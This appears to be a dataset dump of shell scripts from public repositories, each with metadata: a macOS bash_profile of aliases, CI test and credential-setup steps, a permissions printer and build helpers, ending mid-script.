fi
MODEM=$1
LOCAL_IP=$2
AUTHORIZED_IP=$3
echo "Authorizing ${AUTHORIZED_IP} to connect to ${LOCAL_IP} via ${MODEM}"
docker exec ${MODEM} iptables -t nat -F PREROUTING
docker exec ${MODEM} iptables -t nat -A PREROUTING -s ${AUTHORIZED_IP}/32 -p tcp -m tcp --dport 22 -j DNAT --to-destination ${LOCAL_IP}:22
docker exec ${MODEM} iptables -t nat -A PREROUTING -s ${AUTHORIZED_IP}/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination ${LOCAL_IP}:443
echo "Done"
PUBLIC_WAN=$(docker exec ${MODEM} curl -s ifconfig.ovh)
echo "You can now connect with:"
echo "ssh root@${PUBLIC_WAN}"
echo "https://${PUBLIC_WAN}"
| true
|
470728cce2cdf278a3f3250684172c7c33dc9e64
|
Shell
|
atoulme/dotfiles
|
/.bash_profile
|
UTF-8
| 16,358
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
alias vi=vim
function st {
svn st $@
growlNotify -n "SVN" -m "`pwd` status done"
}
function up {
svn up $@
growlNotify -n "SVN" -m "`pwd` updated"
}
alias di="svn diff"
alias cfct="st |grep ^C"
alias modif="st | grep ^M"
alias new="st | grep ^?"
alias ls="ls -G"
alias la="ls -a"
alias ll="ls -l"
alias l="ll"
alias .p='source ~/.bash_profile'
alias ?='h | g '
alias g='grep'
alias h='history'
alias cls='tput clear'
export global MAVEN_OPTS="-Xmx1024M"
export SCALA_HOME="/Users/$(whoami)/tools/scala-2.8.0.final"
export GROOVY_HOME="/Users/$(whoami)/tools/groovy-1.7.1"
export JAVA_HOME="/Library/Java/JavaVirtualMachines/jdk1.8.0_171.jdk/Contents/Home/"
export GRADLE_HOME="/Users/$(whoami)/tools/gradle-2.8"
export global PATH=$PATH":/Users/$(whoami)/tools/mvn3/bin:/opt/local/bin:~/bin:/usr/local/mysql/bin:~/tools/apache-ant-1.7.1/bin:$SCALA_HOME/bin:$GROOVY_HOME/bin:$GRADLE_HOME/bin"
alias mvn=~/tools/mvn3/bin/mvn
function parse_git_dirty {
git diff --quiet HEAD &>/dev/null
[[ $? == 1 ]] && echo "*"
}
function parse_git_branch {
git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e "s/* \(.*\)/[\1$(parse_git_dirty)]/"
}
#export global PS1="\[\033[0;37m\]\t\[\033[0m|\[\033[0;34m\w\[\033[0m|> "
PS1="\[\033[0;37m\]\t\[\033[01;34m\]\w\[\033[00m\]\$(parse_git_branch)>"
alias apache2ctl='sudo /opt/local/apache2/bin/apachectl'
# For SVN
export SVN_EDITOR=vim
export LC_CTYPE=en_US.UTF-8
# Because I keep forgetting the right command, and it is starting to make me really unproductive to google for it every _single_ time
alias untargz='echo "Doh! Use tar xvzf, dummy!" ; tar xvzf'
# Yes, I enjoy insulting myself.
# rm_DS_Store_files: removes all .DS_Store file from the current dir and below
alias rm_DS_Store_files='find . -name .DS_Store -exec rm {} \;'
# zipf: to create a ZIP archive of a file or folder
function zipf { zip -r "$1".zip "$1" ; }
# numFiles: number of (non-hidden) files in current directory
alias numFiles='echo $(ls -1 | wc -l)'
# showTimes: show the modification, metadata-change, and access times of a file
function showTimes { stat -f "%N: %m %c %a" "$@" ; }
# finderComment: show the SpotLight comment for a file
function finderComment { mdls "$1" | grep kMDItemFinderComment ; }
# to remove filename extensions in bash: ${file%\.[^.]*}
#-----------
# Searching:
#-----------
# ff: to find a file under the current directory
function ff () { /usr/bin/find . -name "$@" ; }
# ffs: to find a file whose name starts with a given string
function ffs () { /usr/bin/find . -name "$@"'*' ; }
# ffe: to find a file whose name ends with a given string
function ffe () { /usr/bin/find . -name '*'"$@" ; }
# grepfind: to grep through files found by find, e.g. grepf pattern '*.c'
# note that 'grep -r pattern dir_name' is an alternative if want all files
function grepfind () { find . -type f -name "$2" -print0 | xargs -0 grep "$1" ; }
# I often can't recall what I named this alias, so make it work either way:
alias findgrep='grepfind'
# grepincl: to grep through the /usr/include directory
function grepincl () { (cd /usr/include; find . -type f -name '*.h' -print0 | xargs -0 grep "$1" ) ; }
# locatemd: to search for a file using Spotlight's metadata
function locatemd { mdfind "kMDItemDisplayName == '$@'wc"; }
# locaterecent: to search for files created since yesterday using Spotlight
# This is an illustration of using $time in a query
# See: http://developer.apple.com/documentation/Carbon/Conceptual/SpotlightQuery/index.html
function locaterecent { mdfind 'kMDItemFSCreationDate >= $time.yesterday'; }
# list_all_apps: list all applications on the system
function list_all_apps() { mdfind 'kMDItemContentTypeTree == "com.apple.application"c' ; }
# find_larger: find files larger than a certain size (in bytes)
function find_larger() { find . -type f -size +${1}c ; }
# an example of using Perl to search Unicode files for a string:
# find /System/Library -name Localizable.strings -print0 | xargs -0 perl -n -e 'use Encode; $_ = decode("utf16be", $_); print if /compromised/
# but note that it might be better to use 'iconv'
# example of using the -J option to xargs to specify a placeholder:
# find . -name "*.java" -print0 | xargs -0 -J % cp % destinationFolder
# findword: search for a word in the Unix word list
function findword () { /usr/bin/grep ^"$@"$ /usr/share/dict/words ; }
# dict: lookup a word with Dictionary.app
function dict () { open dict:///"$@" ; }
#---------------
# Text handling:
#---------------
# fixlines: edit files in place to ensure Unix line-endings
function fixlines () { /usr/bin/perl -pi~ -e 's/\r\n?/\n/g' "$@" ; }
# cut80: truncate lines longer than 80 characters (for use in pipes)
alias cut80='/usr/bin/cut -c 1-80'
# foldpb: make text in clipboard wrap so as to not exceed 80 characters
alias foldpb='pbpaste | fold -s | pbcopy'
# enquote: surround lines with quotes (useful in pipes) - from mervTormel
function enquote () { /usr/bin/sed 's/^/"/;s/$/"/' ; }
# casepat: generate a case-insensitive pattern
function casepat () { perl -pe 's/([a-zA-Z])/sprintf("[%s%s]",uc($1),$1)/ge' ; }
# getcolumn: extract a particular column of space-separated output
# e.g.: lsof | getcolumn 0 | sort | uniq
function getcolumn () { perl -ne '@cols = split; print "$cols['$1']\n"' ; }
# cat_pdfs: concatenate PDF files
# e.g. cat_pdfs -o combined.pdf file1.pdf file2.pdf file3.pdf
function cat_pdfs () { python '/System/Library/Automator/Combine PDF Pages.action/Contents/Resources/join.py' "$@" ; }
# numberLines: echo the lines of a file preceded by line number
function numberLines () { perl -pe 's/^/$. /' "$@" ; }
# convertHex: convert hexadecimal numbers to decimal
function convertHex () { perl -ne 'print hex(), "\n"' ; }
# allStrings: show all strings (ASCII & Unicode) in a file
function allStrings () { cat "$1" | tr -d "\0" | strings ; }
# /usr/bin/iconv & /sw/sbin/iconv convert one character encoding to another
# to convert text to HTML and vice vera, use 'textutil'
# to convert a man page to PDF: man -t foo > foo.ps; open foo.ps; save as PDF
#------------
# Processes:
#------------
alias pstree='/sw/bin/pstree -g 2 -w'
# findPid: find out the pid of a specified process
# Note that the command name can be specified via a regex
# E.g. findPid '/d$/' finds pids of all processes with names ending in 'd'
# Without the 'sudo' it will only find processes of the current user
function findPid () { sudo /usr/sbin/lsof -t -c "$@" ; }
# to find memory hogs:
alias mem_hogs_top='top -l 1 -o rsize -n 10'
alias mem_hogs_ps='ps wwaxm -o pid,stat,vsize,rss,time,command | head -10'
# to find CPU hogs
alias cpu_hogs='ps wwaxr -o pid,stat,%cpu,time,command | head -10'
# continual 'top' listing (every 10 seconds) showing top 15 CPU consumers
alias topforever='top -l 0 -s 10 -o cpu -n 15'
# recommended 'top' invocation to minimize resources in thie macosxhints article
# http://www.macosxhints.com/article.php?story=20060816123853639
# exec /usr/bin/top -R -F -s 10 -o rsize
# diskwho: to show processes reading/writing to disk
alias diskwho='sudo iotop'
#------------
# Networking:
#------------
# lsock: to display open sockets (the -P option to lsof disables port names)
alias lsock='sudo /usr/sbin/lsof -i -P'
# airportMtu: set the MTU on Airport to be a value that makes SMTP to DSL work
# (I determined the value empirically by using 'ping -s' to the SMTP server)
alias airportMtu='sudo ifconfig en1 mtu 1364'
# airport: Apple's command-line tool. For status info, use -I, for help use -h
# See: http://www.macosxhints.com/article.php?story=20050715001815547
alias airport='/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport'
# Note also the tool that I compiled: airport_info (in my Tools dir)
# ip_info: to get info on DHCP server, router, DNS server, etc (for en0 or en1)
alias ip_info='ipconfig getpacket en1'
# browse_bonjour: browse services advertised via Bonjour
# Note: need to supply a "type" argument- e.g. "_http._tcp"
# See http://www.dns-sd.org/ServiceTypes.html for more types
# Optionally supply a "domain" argument
alias browse_bonjour='dns-sd -B'
# hostname_lookup: interactive debugging mode for lookupd (use tab-completion)
alias hostname_lookup='lookupd -d'
# debug_http: download a web page and show info on what took time
function debug_http () { /usr/bin/curl $@ -o /dev/null -w "dns: %{time_namelookup} connect: %{time_connect} pretransfer: %{time_pretransfer} starttransfer: %{time_starttransfer} total: %{time_total}\n" ; }
# http_headers: get just the HTTP headers from a web page (and its redirects)
function http_headers () { /usr/bin/curl -I -L $@ ; }
# Note: 'active_net_iface' is my script that echos the active net interface
# pkt_trace: for use in the following aliases
alias pkt_trace='sudo tcpflow -i `active_net_iface` -c'
# smtp_trace: to show all SMTP packets
alias smtp_trace='pkt_trace port smtp'
# http_trace: to show all HTTP packets
alias http_trace='pkt_trace port 80'
# tcp_trace: to show all TCP packets
alias tcp_trace='pkt_trace tcp'
# udp_trace: to show all UDP packets
alias udp_trace='pkt_trace udp'
# ip_trace: to show all IP packets
alias ip_trace='pkt_trace ip'
# can use 'scselect' to find out current network "location"
# can use 'scutil' for other system config stuff
# to do socket programming in bash, redirect to /dev/tcp/$host/$port
# Example:
function osaClient ()
{
exec 5<> /dev/tcp/localhost/4321
cat $1 >&5
echo "-- end of file" >&5
cat <&5
exec 5>&-
}
#------
# Misc:
#------
# epochtime: report number of seconds since the Epoch
alias epochtime='date +%s'
# screensaverdesktop: run a screensaver on the Desktop
alias screensaverdesktop='/System/Library/Frameworks/ScreenSaver.framework/Resources/ScreenSaverEngine.app/Contents/MacOS/ScreenSaverEngine -background'
# consoleapp: launch the Console app from Terminal
alias consoleapp='/Applications/Utilities/Console.app/Contents/MacOS/Console &'
#---------------------------
# System operations & info:
#---------------------------
# repairpermissions
alias repairpermissions='sudo diskutil repairpermissions /'
# install all software updates from the command line
alias software_update_cmd='COMMAND_LINE_INSTALL=1 export COMMAND_LINE_INSTALL; sudo softwareupdate -i -a'
# third_party_kexts: to check for non-Apple kernel extensions
alias third_party_kexts='kextstat | grep -v com.apple'
# show_optical_disk_info - e.g. what type of CD & DVD media is supported
alias show_optical_disk_info='drutil info'
# remove_disk: spin down unneeded disk
# diskutil eject /dev/disk1s3
alias nd0='diskutil eject /dev/disk0s3'
alias nd1='diskutil eject /dev/disk1s3'
# mount_read_write: for use when booted into single-user
alias mount_read_write='/sbin/mount -uw /'
# herr: shows the most recent lines from the HTTP error log
alias herr='tail /var/log/httpd/error_log'
# use vsdbutil to show/change the permissions ignoring on external drives
# To ignore ownerships on a volume, do: sudo vsdbutil -d /VolumeName
# To restore ownerships on a volume, do: sudo vsdbutil -a /VolumeName
# To check the status of ownerships, do: sudo vsdbutil -c /VolumeName
alias ignore_permissions='sudo vsdbutil -d'
# to change the password on anencrypted disk image:
# hdiutil chpass /path/to/the/diskimage
# netparams: to show values of network parameters in the kernel
alias netparams='sysctl -a | grep net'
# swapinfo: to display info on swap
alias swapinfo='sysctl vm.swapusage'
# get info about system via AppleScript
# Note: this is rather slow - it is faster to run 'system_profiler'
# Note: to get computer name use: computer name of (system info)
function applescript_info ()
{
info=$( /usr/bin/osascript <<" EOT"
system info
EOT
)
echo $info
}
# to mount a read-only disk image as read-write:
# hdiutil attach example.dmg -shadow /tmp/example.shadow -noverify
# mounting a removable drive (of type msdos or hfs)
# mkdir /Volumes/Foo
# ls /dev/disk* to find out the device to use in the mount command)
# mount -t msdos /dev/disk1s1 /Volumes/Foo
# mount -t hfs /dev/disk1s1 /Volumes/Foo
# to create a file of a given size: /usr/sbin/mkfile or /usr/bin/hdiutil
# e.g.: mkfile 10m 10MB.dat
# e.g.: hdiutil create -size 10m 10MB.dmg
# the above create files that are almost all zeros - if random bytes are desired
# then use: ~/Dev/Perl/randBytes 1048576 > 10MB.dat
# making a hard-link backup of a directory
# rsync -a --delete --link-dest=$DIR $DIR /backup/path/for/dir
# starting AFP file sharing
alias startFileSharing='sudo /usr/sbin/AppleFileServer'
# hidden command line utilities: networksetup & systemsetup
alias networksetup='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/networksetup'
alias systemsetup='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup'
alias ardkickstart='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart'
#--------
# Finder:
#---------
# show hidden files in Finder
alias finderShowHidden='defaults write com.apple.finder ShowAllFiles TRUE'
alias finderHideHidden='defaults write com.apple.finder ShowAllFiles FALSE'
# finderTurnOffDesktop: turn off display of files on the Desktop
alias finderTurnOffDesktop='defaults write com.apple.finder CreateDesktop FALSE'
# to stop Finder writing .DS_Store files on network volumes
# defaults write com.apple.desktopservices DSDontWriteNetworkStores true
# lsregister: utility for looking at the Launch Services database
# e.g. 'lsregister -dump' to display database contents
# use 'lsregister -h' to get usage info
alias lsregister='/System/Library/Frameworks/ApplicationServices.framework/Frameworks/LaunchServices.framework/Support/lsregister'
# disable and re-enable Dashboard Widgets
alias disableDashboard='defaults write com.apple.dashboard mcx-disabled -bool YES; killall Dock'
alias enableDashboard='defaults delete com.apple.dashboard mcx-disabled; killAll Dock'
# ql: show a "Quick Look" view of files
function ql () { /usr/bin/qlmanage -p "$@" >& /dev/null & }
# locateql: search using Spotlight and show a "Quick Look" of matching files
function locateql ()
{
locatemd "$@" | enquote | xargs qlmanage -p >& /dev/null &
}
alias cdf='eval `osascript /Applications/OpenTerminal.app/Contents/Resources/Scripts/OpenTerminal.scpt `'
alias scppasswd="scp -o PreferredAuthentications=password -o PubkeyAuthentication=no"
alias sshpasswd="ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no"
#--------
# Safari:
#--------
# cleanup_favicons: clean up Safari favicons
alias cleanup_favicons='find $HOME/Library/Safari/Icons -type f -atime +30 -name "*.cache" -print -delete'
#-----------------
# Misc Reminders:
#-----------------
# To find idle time: look for HIDIdleTime in output of 'ioreg -c IOHIDSystem'
# to set the delay for drag & drop of text (integer number of milliseconds)
# defaults write -g NSDragAndDropTextDelay -int 100
# URL for a man page (example): x-man-page://3/malloc
# to read a single key press:
alias keypress='read -s -n1 keypress; echo $keypress'
# to compile an AppleScript file to a resource-fork in the source file:
function osacompile_rsrc () { osacompile -x -r scpt:128 -o $1 $1; }
# alternative to the use of 'basename' for usage statements: ${0##*/}
# graphical operations, image manipulation: sips
# numerical user id: 'id -u'
# e.g.: ls -l /private/var/tmp/mds/$(id -u)
####################################
# History Settings
####################################
shopt -s histappend # Make Bash append rather than overwrite the history on disk
PROMPT_COMMAND='history -a' # Whenever displaying the prompt, write the previous line to disk
export HISTSIZE=3000
export HISTFILESIZE=3000
# don't put duplicate lines in the history. See bash(1) for more options
export HISTCONTROL=ignoredups
# ... and ignore same sucessive entries.
export HISTCONTROL=ignoreboth
# MacPorts Installer addition on 2009-12-06_at_19:25:13: adding an appropriate PATH variable for use with MacPorts.
export PATH=/opt/local/bin:/opt/local/sbin:$PATH
# Finished adapting your PATH environment variable for use with MacPorts.
#RVM!
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"
for f in ~/.bash.d/*; do source $f; done
| true
|
6116b1c4fcf270a5bf55bb243ebb058441ae825c
|
Shell
|
CGuichardMasterDL/MCS_DTW
|
/scripts/test.sh
|
UTF-8
| 726
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ ! -d "venv" ]
then
echo "[Pas de virtualenv trouvé. Utilisation du python3 par défaut]"
else
echo "[Utilisation du virtualenv]"
source "venv/bin/activate"
fi
printf "\033[0;36m#====== TEST =====#\033[0m\n\n"
test1=$(python3 --help 2>/dev/null | grep -c "usage:")
test2=$(python3 -mnose --help 2> /dev/null)
if [ "$test1" -eq 1 ] && [ -n "$test2" ]; then
mkdir -p out
mkdir -p out/tests
rm -rf out/tests/*
python3 -m nose tests
rm -f tests/*.pyc
printf "\n\033[0;32m#====== DONE =====#\033[0m\n"
else
printf "\033[1;31mErreur\033[0m: Veuillez installer les paquets nécessaires (voir le README.md).\n"
printf "\n\033[0;31m#====== FAILED =====#\033[0m\n"
fi
| true
|
081d9ef763ea02813a996682dc0ed4d943606817
|
Shell
|
openshift/release
|
/ci-operator/step-registry/ipi/conf/gcp/oidc-creds-additional/ipi-conf-gcp-oidc-creds-additional-commands.sh
|
UTF-8
| 1,733
| 3.59375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -o nounset
set -o errexit
set -o pipefail
image_registry_credential_yaml="${SHARED_DIR}/manifest_openshift-image-registry-installer-cloud-credentials-credentials.yaml"
if [[ ! -f "${image_registry_credential_yaml}" ]]; then
echo "'${image_registry_credential_yaml}' not found, abort." && exit 1
fi
PROJECT_NAME=$(< "${CLUSTER_PROFILE_DIR}/openshift_gcp_project")
export GOOGLE_CLOUD_KEYFILE_JSON="${CLUSTER_PROFILE_DIR}/gce.json"
sa_email=$(jq -r .client_email ${GOOGLE_CLOUD_KEYFILE_JSON})
if ! gcloud auth list | grep -E "\*\s+${sa_email}"
then
gcloud auth activate-service-account --key-file="${GOOGLE_CLOUD_KEYFILE_JSON}"
gcloud config set project "${PROJECT_NAME}"
fi
infra_name=${NAMESPACE}-${UNIQUE_HASH}
working_dir=`mktemp -d`
pushd "${working_dir}"
echo -e "\n$(date -u --rfc-3339=seconds) - Creating long-live key for image-registry (https://docs.openshift.com/container-platform/4.10/authentication/managing_cloud_provider_credentials/cco-mode-gcp-workload-identity.html#cco-ccoctl-gcp-image-registry_cco-mode-gcp-workload-identity)"
image_registry_sa=$(gcloud iam service-accounts list --filter="displayName=${infra_name}-openshift-image-registry-gcs" --format=json | jq -r '.[].email')
new_key_json="image_registry_key.json"
gcloud iam service-accounts keys create "${new_key_json}" --iam-account="${image_registry_sa}"
new_key_str_b64=$(cat "${new_key_json}" | base64 -w 0)
yq-go r -j "${image_registry_credential_yaml}" > tmp1.json
jq --arg k "${new_key_str_b64}" '.data["service_account.json"] = $k' < tmp1.json > tmp2.json
cat tmp2.json | yq-go r -P - > "${image_registry_credential_yaml}"
popd
echo -e "\n$(date -u --rfc-3339=seconds) - Updated image-registry SA with long-live key."
| true
|
588cb873ffe6672f5c1409fa986d462a0ca3d07a
|
Shell
|
ndarapaneni/scripts
|
/linux-scripts/freememory.sh
|
UTF-8
| 345
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
memory=$(free -g | awk '{print $4 }' | head -2| tail -1)
fullmemo=$(free -g | awk '{print $2}'|head -2 |tail -1)
p="$((100*$memory/$fullmemo))"
echo "Percentage of Memory available is: $p% "
if [ "$p" -lt 30 ];
then
echo "you are running on low memory:: you have only $p%"
else
echo "you are good, you have $p% memory"
fi
| true
|
15b0901d3f0597a74fca146dff60eb00ffbdfee7
|
Shell
|
Frogging-Family/wine-tkg-git
|
/wine-tkg-git/wine-tkg-patches/proton/proton-winevulkan/proton-winevulkan
|
UTF-8
| 3,533
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ "$_update_winevulkan" = "true" ] && git merge-base --is-ancestor 7e736b5903d3d078bbf7bb6a509536a942f6b9a0 HEAD && ! git merge-base --is-ancestor 656edbb508d51cbe3155d856ee3f2c27a6cd4cba HEAD && ( ! git merge-base --is-ancestor 0f972e2247932f255f131792724e4796b4b2b87a HEAD || git merge-base --is-ancestor 21e002aa7e7f85d92d1efeaeb7a9545eb16b96ad HEAD && [ "$_proton_fs_hack" = "true" ] ); then
if git merge-base --is-ancestor 221995a6838da5be2217735c3b1e1b1cd8f01e9f HEAD; then
if [ "$_proton_fs_hack" = "true" ]; then
_patchname='proton-winevulkan.patch' && _patchmsg="Using Proton winevulkan patches" && nonuser_patcher
else
_patchname='proton-winevulkan-nofshack.patch' && _patchmsg="Using Proton winevulkan patches (nofshack)" && nonuser_patcher
fi
else
if git merge-base --is-ancestor 8285f616030f27877922ff414530d4f909306ace HEAD; then
_lastcommit="221995a"
elif git merge-base --is-ancestor 9561af9a7d8d77e2f98341e278c842226cae47ed HEAD; then
_lastcommit="8285f61"
elif git merge-base --is-ancestor 88da78ef428317ff8c258277511abebf1a75e186 HEAD; then
_lastcommit="9561af9"
elif git merge-base --is-ancestor c681a0732fc3c6466b228417bb5e0d518d26b819 HEAD; then
_lastcommit="88da78e"
elif git merge-base --is-ancestor eb9f3dd3ad07aae3c9588bcff376ed2a7a8ef8d2 HEAD; then
_lastcommit="c681a07"
elif git merge-base --is-ancestor 7d8c50e4371f2fc5300b90b323210c922d80d4e9 HEAD; then
_lastcommit="eb9f3dd"
elif git merge-base --is-ancestor fc893489fe89c9fbd22f0cbe1c4327c64f05e0dc HEAD; then
_lastcommit="7d8c50e"
elif git merge-base --is-ancestor bff6bc6a79ffc3a915219a6dfe64c9bcabaaeceb HEAD; then
_lastcommit="fc89348"
elif git merge-base --is-ancestor 1e074c39f635c585595e9f3ece99aa290a7f9cf8 HEAD; then
_lastcommit="bff6bc6"
elif git merge-base --is-ancestor 8bd62231c3ab222c07063cb340e26c3c76ff4229 HEAD; then
_lastcommit="1e074c3"
elif git merge-base --is-ancestor 380b7f28253c048d04c1fbd0cfbc7e804bb1b0e1 HEAD; then
_lastcommit="8bd6223"
elif git merge-base --is-ancestor 408a5a86ec30e293bf9e6eec4890d552073a82e8 HEAD; then
_lastcommit="380b7f2"
elif git merge-base --is-ancestor d2f552d1508dbabb595eae23db9e5c157eaf9b41 HEAD; then
_lastcommit="408a5a8"
elif git merge-base --is-ancestor 594814c00ab059d9686ed836b1865f8a94859c8a HEAD; then
_lastcommit="d2f552d"
elif git merge-base --is-ancestor 086c686e817a596e35c41dd5b37f3c28587af9d5 HEAD; then
_lastcommit="594814c"
elif git merge-base --is-ancestor bdeae71bc129ac83c44753672d110b06a480c93c HEAD; then
_lastcommit="086c686"
elif git merge-base --is-ancestor 7b1622d1ab90f01fdb3a2bc24e12ab4990f07f68 HEAD; then
_lastcommit="bdeae71"
#elif git merge-base --is-ancestor 7e736b5903d3d078bbf7bb6a509536a942f6b9a0 HEAD; then
# _lastcommit="7b1622d"
else
_lastcommit="none"
fi
if [ "$_lastcommit" != "none" ]; then
if [ "$_proton_fs_hack" = "true" ]; then
_patchname="proton-winevulkan-$_lastcommit.patch" && _patchmsg="Using Proton winevulkan patches" && nonuser_patcher
else
_patchname="proton-winevulkan-nofshack-$_lastcommit.patch" && _patchmsg="Using Proton winevulkan patches (nofshack)" && nonuser_patcher
fi
fi
fi
fi
| true
|
18a646f5728c0a3731ff765afc9112a62a5f9f53
|
Shell
|
Jeremie-C/my-dnsmasq-gen
|
/hooks/.config
|
UTF-8
| 2,502
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set +u
# Send Variables
echo "SOURCE_BRANCH: $SOURCE_BRANCH"
echo "SOURCE_COMMIT: $SOURCE_COMMIT"
echo "COMMIT_MSG: $COMMIT_MSG"
echo "DOCKER_REPO: $DOCKER_REPO"
echo "DOCKERFILE_PATH: $DOCKERFILE_PATH"
echo "CACHE_TAG: $CACHE_TAG"
echo "IMAGE_NAME: $IMAGE_NAME"
echo
# Base Variable
BUILD_DATE=$(date -u +'%Y-%m-%dT%H:%M:%Sz')
BUILD_REF=`git rev-parse --short HEAD`
MANIF_ALL='latest'
# Branche MASTER
if [ ${SOURCE_BRANCH} = 'master' ]; then
DOCKER_TAG="${BUILD_REF}"
MANIF_ALL="${SOURCE_BRANCH}"
fi
# Autres branches avec tag dev
if [ ${DOCKER_TAG} = 'develop' ]; then
DOCKER_TAG="${BUILD_REF}"
MANIF_ALL="${SOURCE_BRANCH}"
fi
# Si on entre un tag latest
if [ ${DOCKER_TAG} = 'latest' ]; then
DOCKER_TAG="${BUILD_REF}"
MANIF_ALL="${SOURCE_BRANCH}"
fi
# Dans les autres cas, on prends les valeurs de DockerHub
# et on génére le manifest LATEST
# Set Image Name
IMAGE_NAME="${DOCKER_REPO}:${DOCKER_TAG}"
# DockerFile
: "${DOCKERFILE_PATH:=./Dockerfile}"
# Informations
echo "✅ Variables after applying defaults:"
echo "DOCKERFILE_PATH: $DOCKERFILE_PATH"
echo "IMAGE_NAME: $IMAGE_NAME"
echo "MANIFEST_TAG: $MANIF_ALL"
echo
# Path
export PATH="$PWD/docker:$PATH"
# => https://hub.docker.com/u/arm64v8/
declare -A base_image_prefix_map=( ["arm64v8"]="arm64v8/" ["arm32v5"]="arm32v5/" ["arm32v6"]="arm32v6/" ["arm32v7"]="arm32v7/" ["amd64"]="")
# => dpkg -L qemu-user-static | grep /usr/bin/
declare -A docker_qemu_arch_map=( ["arm64v8"]="aarch64" ["arm32v5"]="arm" ["arm32v6"]="arm" ["arm32v7"]="arm" ["amd64"]="x86_64")
# => https://github.com/docker/docker-ce/blob/76ac3a4952a9c03f04f26fc88d3160acd51d1702/components/cli/cli/command/manifest/util.go#L22
declare -A docker_to_manifest_map=( ["arm64v8"]="arm64" ["arm32v5"]="arm" ["arm32v6"]="arm" ["arm32v7"]="arm" ["amd64"]="amd64")
# => Variants
declare -A docker_to_variant_map=( ["arm64v8"]="v8" ["arm32v5"]="v5" ["arm32v6"]="v6" ["arm32v7"]="v7" ["amd64"]="")
# =>
declare -A docker_gen_binary_map=( ["arm32v6"]="armhf" ["arm32v7"]="armhf" ["arm64v8"]="arm64" ["amd64"]="amd64" )
# what we want to build
build_architectures=(amd64 arm32v6 arm32v7 arm64v8)
verified_build_architectures=()
# what we can build
for arch in ${build_architectures[@]}; do
if [ -f "qemu-${docker_qemu_arch_map[${arch}]}-static" ]; then
echo "qemu binary for $arch found";
verified_build_architectures+=($arch)
fi
done
# Final list
echo $verified_build_architectures
set -u
docker -v
echo
| true
|
ab67cc535c1e2eff57c5db9db15b4c923048ecfb
|
Shell
|
guilhermeG23/Shell_Script_Praticos
|
/permissoes.sh
|
UTF-8
| 1,173
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
imprimir() {
echo =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
echo Permissao: $1
echo Arquivo: $2
valor=`echo $1 | cut -c1`
if [ $valor = '-' ]; then
echo Tipo $valor '-> Arquivo regular'
elif [ $valor = 'd' ]; then
echo Tipo $valor '-> Diretorio'
elif [ $valor = 'i' ]; then
echo Tipo $valor '-> Link simbolico'
fi
Escrita=`echo $1 | cut -c2`
Leitura=`echo $1 | cut -c3`
Execucao=`echo $1 | cut -c4`
echo Dono '->' Escrita $Escrita '|' Leitura $Leitura '|' Execucao $Execucao
Escrita=`echo $1 | cut -c5`
Leitura=`echo $1 | cut -c6`
Execucao=`echo $1 | cut -c7`
echo Grupo '->' Escrita $Escrita '|' Leitura $Leitura '|' Execucao $Execucao
Escrita=`echo $1 | cut -c8`
Leitura=`echo $1 | cut -c9`
Execucao=`echo $1 | cut -c10`
echo Outros '->' Escrita $Escrita '|' Leitura $Leitura '|' Execucao $Execucao
Link=`echo $1 | cut -c11`
if [ "$Link" ]; then
echo Link '->' $Link
fi
echo =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
}
ls -la | awk '{ print $1,$9 }' | sed '1d' > saida.txt
while read linha; do
compara=`echo $linha | awk '{ print $2 }'`
if [ $compara != 'saida.txt' ]; then
imprimir $linha
fi
done < saida.txt
rm -rf saida.txt
| true
|
90ac456f5c592bb21379917dafdefa3cb41567ee
|
Shell
|
troglobit/finit
|
/test/skel/bin/slay
|
UTF-8
| 862
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
nm=$1
# shellcheck disable=SC2046
getpid()
{
initctl status "$1" |awk '/PID :/{ print $3; }'
}
pid=$(getpid "$nm")
if [ -f oldpid ]; then
oldpid=$(cat oldpid)
if [ "$oldpid" = "$pid" ]; then
echo "Looks bad, wait for it ..."
sleep 3
pid=$(getpid "$nm")
if [ "$oldpid" = "$pid" ]; then
echo "Finit did not deregister old PID $oldpid vs $pid"
initctl status "$nm"
ps
echo "Reloading finit ..."
initctl reload
sleep 1
initctl status "$nm"
exit 1
fi
fi
fi
timeout=50
while [ "$pid" -le 1 ]; do
sleep 0.1
pid=$(getpid "$nm")
if [ "$pid" -le 1 ]; then
timeout=$((timeout - 1))
if [ "$timeout" -gt 0 ]; then
continue
fi
echo "Got a bad PID: $pid, aborting ..."
ps
sleep 1
initctl status "$nm"
ps
exit 1
fi
break
done
echo "$pid" > /tmp/oldpid
#echo "PID $pid, kill -9 ..."
kill -9 "$pid"
| true
|
367b3570a7fbd03eca89daf62b35f1eb23af13bd
|
Shell
|
tyll/dracut-cryptssh
|
/89cryptssh/kill-dropbear.sh
|
UTF-8
| 225
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
pidfile=/tmp/dropbear.pid
[ -e $pidfile ] || exit 0
read PID < $pidfile
# stop listening process
kill -SIGSTOP $PID
# Kill all child processes
pkill -P $PID
# Kill listening process
kill $PID
kill -SIGCONT $PID
| true
|
058c318e7d4ebf0cb3dd787a8c95d558afad974b
|
Shell
|
digital-asset/ghc-lib
|
/ghc-lib-stack-matrix-build-test.sh
|
UTF-8
| 425
| 2.640625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
set -euo pipefail
flavors=("ghc-master" "ghc-9.6.1")
resolvers=("ghc-9.4.4" "ghc-9.2.5" "ghc-9.2.2")
for f in "${flavors[@]}"; do
for r in "${resolvers[@]}"; do
echo "-- "
